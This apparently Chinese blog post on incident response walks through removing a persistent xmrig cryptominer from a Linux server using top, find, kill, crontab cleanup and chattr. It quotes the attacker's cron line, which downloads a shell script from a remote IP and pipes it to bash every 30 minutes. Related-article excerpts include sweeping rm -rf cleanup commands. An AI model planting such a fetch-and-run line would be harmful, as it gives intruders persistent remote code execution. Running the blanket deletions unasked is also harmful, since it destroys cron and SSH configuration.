个人总结之xmrig 挖矿自动化程序如何彻底删除【Linux问题】

最新推荐文章于 2025-03-21 17:26:49 发布
最新推荐文章于 2025-03-21 17:26:49 发布
阅读量1.9k 收藏 6
点赞数 4
分类专栏: Linux 文章标签: 自动化 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_51125809/article/details/144709632
版权

第一步 检查是否存在xmrig正在执行的进程

# 在Linux 系统界面中执行 top
1 root      20   0  185340  12584   8876 S   190.0   180.3   0:04.82 xmrig

正在被挖矿程序占用所有CPU等资源,导致本身业务无内存可用。

第二步 查看当前xmrig 文件在何处并删除

# 你可以获取 它的所在文件
find / -name xmrig 
/etc/.system/php/xmrig 

# 直接删除当前文件
rm -rf /etc/.system/php

# 然后kill掉当前正在运行的进程PID【就是刚刚查询到的进程PID】
kill -9 PID

这里是通过systemctl list-units --type=service | grep xmrig来进行查询当前系统服务并返回它运行状态

通过systemctl list-units --type=service | grep xmrig

你会发现上面的方式的确可以删除,但是过段时间进程依然存在

这个时候开始怀疑是否存在【定时任务】crontab来创建当前进程

第三步 查看是否存在定时任务来创建删除的文件和xmrig挖矿程序

就在此时,我们通过vim /etc/crontab 打开当前文件
打开文件

vim /etc/crontab

会发现存在若干针对不属于你当前的定时任务 例如

*/30 * * * * root cd1 -fsSL http://IP/php/php_8020.sh | bash
ps: 这里的IP就是那些挖矿程序的下载主机的IP

首先我们进行删除当前可执行文件中包含这种异常的定时任务【排除当前你自己写的定时任务】
ps:在删除后ESC,保存时发现当前文件没有修改权限

Operation not permitted

在退出查看时,并修改chmod 权限

chmod +x /etc/crontab

如果这里修改权限出现【chmod: changing permissions of ‘/etc/crontab’: Operation not permitted】
这里很有可能是挖矿人将这个定时任务文件进行移除不可变(i)和附加(a)属性

lsattr /etc/crontab
----ia--------e----- /etc/crontab

我们首先移除i 和a 属性

sudo chattr -i -a /etc/crontab

之后,你可以再尝试修改文件权限:

sudo chmod 644 /etc/crontab

最后查看文件

lsattr /etc/crontab

文章到这里也接近尾声!有什么错误的地方希望指正。

记一次清理挖矿病毒的过程
邓邓子的博客
07-05 2107
网站挂掉了,查看后台服务已宕掉,无法正常重启。在没有启动任何服务的情况下,内存已基本被耗尽: 2.查看各进程资源使用情况 看到 xmrig 占用了资源。 查看 root 文件内容: 查看 .moneroocean 目录下文件: 4.删除文件 5.杀掉 xmrig 进程 查找所有的 xmrig 进程并杀掉: 6.重启服务 最好重启下服务器再重启服务,此时服务已正常。......
Linux应急响应思路和技巧(一):进程分析篇
WangsuSecurity的博客
05-27 2007
本文总结自网宿安全演武实验室安全应急响应团队日常工作实践
最新挖矿病毒xmrig清除方法和原理
m0_73140589的博客
03-21 6525
手机端接收短信提醒,服务器正遭受挖矿病毒攻击,服务器的cpu和内存占用高,阿里云不断告警
linux服务器挖矿程序xmrig入侵以及解决方案
热门推荐
weixin_46575363的博客
09-03 1万+
记一次Xmrig挖矿木马排查过程 2021年9月2日晚上,突然收到阿里云的一条短信,说是服务器被挖矿软件入侵了,马上打开电脑查看 控制台CPU占用 原因分析与解决方案 寻找原因 查找挖矿进程 top -H 从图上我们可以找到CPU占用100%的进行名为xmrig(甚至都不伪装一下进程名) 查找挖矿程序文件位置 root@xxx:/# find / -name ‘xmrig’ /root/.c3pool/xmrig --config=/root/.c3pool/config.json 我们尝试kill掉
高CPU占用:xmrig问题排查
最新发布
qiushile的专栏
03-21 328
xmrig病毒分析与解决
服务器中了 xmrig 挖矿病毒,杀掉进程后又再次出来进程的解决方法
qq_38398347的博客
02-09 4212
通过网络地址查看下载的 shell 脚本,会发现脚本会将病毒文件拉到 c3pool 中执行,然后会删除 c3pool 目录。我尝试直接通过 kill -9 pid 将进程杀掉后,第二天发现又有了,然后想到了这个病毒应该是通过定时任务在执行。这条定时任务每隔23小时就要执行个 shell 脚本,通过路径找到 shell 脚本文件。通过搜索发现 mxrig 是个挖矿病毒,然后就开始查找解决此病毒的方法。所以,我们将病毒进程杀掉后,再将定时任务删除就行了。打开 cron 目录中的文件后,发现了一条定时任务。
xmrig挖矿病毒彻底清除
mynameisjinxiaokai的博客
04-20 1万+
1、通过top命令查看进程发现,占用CPU最大的进程是一个叫xmrig的进程。3、最后一定要修改机器密码,不然过几天还会存在。2、找到xmrig所在的文件并删除。记录下进程的PID,然后杀死进程。
Linux挖矿程序清除
延成的博客
09-01 1550
【代码】Linux挖矿程序清除。
根除矿机病毒xmrig
qq_19582693的博客
07-28 5273
根除xmrig矿机病毒
xmrig挖矿程序删除指南
大小先生
01-10 596
我没有删除成功的原因是他下载的太快了,大家可以先参考着删除一遍,如果能删除就是最好的,如果不行的话,重装系统吧。
linux服务器彻底清除xmrig挖矿病毒
暴走地水牛的博客
06-02 4799
linux服务器上彻底清除xmrig挖矿病毒
阿里云服务器中招挖矿病毒XMrig miner解决方法
Starbme_2018的博客
03-18 1万+
今天阿里云的项目经理给我打电话问我的服务器是否没有使用计划,确实自从上次中毒后就没再使用。今天登录阿里云服务器 WindowsServer2012 远程桌面,发现XMrig miner.exe cpu进程占用高达80%以上,cpu总占用达到99%,查了下时间是昨天十点开始进程占用率奇高的,因此我知道头痛的事情又来了:挖矿病毒又回来了。。。 查了一下告警信息,如下: 该告警由如下引擎检测发现:...
centos7挖矿病毒(xmrig,javs)清理
yuanwendong11的博客
07-26 4590
1. 查看计划任务 ls /var/spool/cron 删除异常任务其配置项。如果当前系统之前并未配置过计划任务,可以直接删除计划脚本目录即可: rm -rf /var/spool/cron/* 2. 查看密钥认证文件 删除木马创建的密钥认证文件,如果当前系统之前并未配置过密钥认证,可以直接清空认证存放目录: rm -rf /root/.ssh/* 如果有配置过密钥认证,需要删除指定的黑客创建的认证文件即可。 3. 修复 SSH 配置项 一般默认脚本中进行修改的 PermitRootLogin、R.
xmrig怎么使算力最大
02-16
好的,用户现在问的是如何让xmrig的算力最大化。之前他已经询问过挖矿对硬盘的影响,现在转向了具体的挖矿软件优化,这说明他可能已经决定进行挖矿,并且更关注如何提高收益。需要先确定用户使用xmrig挖的是什么币种...
加密货币挖矿分析:E3-1230 v2在挖矿中的实战应用
本文对加密货币挖矿进行了全面的探讨,重点分析了E3-1230 v2处理器在挖矿中的性能表现,并探讨了其硬件性能指标、挖矿软件兼容性以及性能优化与调校策略。通过对比分析不同的挖矿池,提供了实战部署的实例和挖矿过程...
蓝队-应急响应01-挖矿事件应急处置
jklove9的博客
02-08 1545
通常情况下会通过未授权访问漏洞,弱口令(口令爆破)等方式,具体是什么方式,还需要看被入侵的服务器具体开放了哪些端口或者服务?挖矿程序主要是利用GPU等资源进行挖矿操作,最直接的现象就是CPU拉满,消耗电力等。下述可以清楚看到,运行挖矿程序之后,查看CPU状态是拉满的,即100%。经过上述分析,基本确认是挖矿,确认挖矿之后,需要进一步探究挖矿程序是如何被上传?挖矿程序通常会有相应的配置文件,如下config.json所示,可以看到钱包地址,挖矿域名等。依据挖矿程序,全盘搜索,发现下述两个路径均存在挖矿程序
记一次挖矿病毒xmrig入侵后系统内存过高的处理
XIxixi丶曦的博客
09-08 1389
挖矿病毒xmrig github链接 xmrig处理 优快云上很多,此处引用“xixiyuguang”的文章 入侵后排查 top 查看内存 和 cpu ->指向启动进程,kill掉 删除定时任务 查看新加用户,删除ssh后门 查看命令操作history 清除完毕后,重启服务仍发现内存过高,与正常不同。但是cpu已经正常,也没有Tcp连接外部服务器。 top命令发现内存数值不相等 free -m 查看内存详情也是占用过高 猜测是进来之后提权修改了系统配置文件。 看下大页内存有没预留: 可以用以
xmrig挖矿病毒解决办法
zqh15730733676的博客
02-21 514
1、找到xmrig文件,删除里面的挖矿脚本,然后执行chattr +i /path/to/folder ,杀死进程。如果linux服务器上发现了xmrig挖矿病毒,删掉文件,杀死进程之后又出现了,怎么都解决不了可以试试以下方法。
彻底清除Centos xmrig木马(普通用户情况)
桂圆的博客
04-14 1万+
文章目录一、排查:二、解决三、后序 情况: 开发同事报update用户连接不上系统,故此上服务器查看 由于是docker建立的系统没怎么在意安全,密码设置很简单 一、排查: # su - update 发现密码已经错误 # top ![top命令查看](https://img-blog.csdnimg.cn/20210414183615426.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cH
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

自律Mail

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值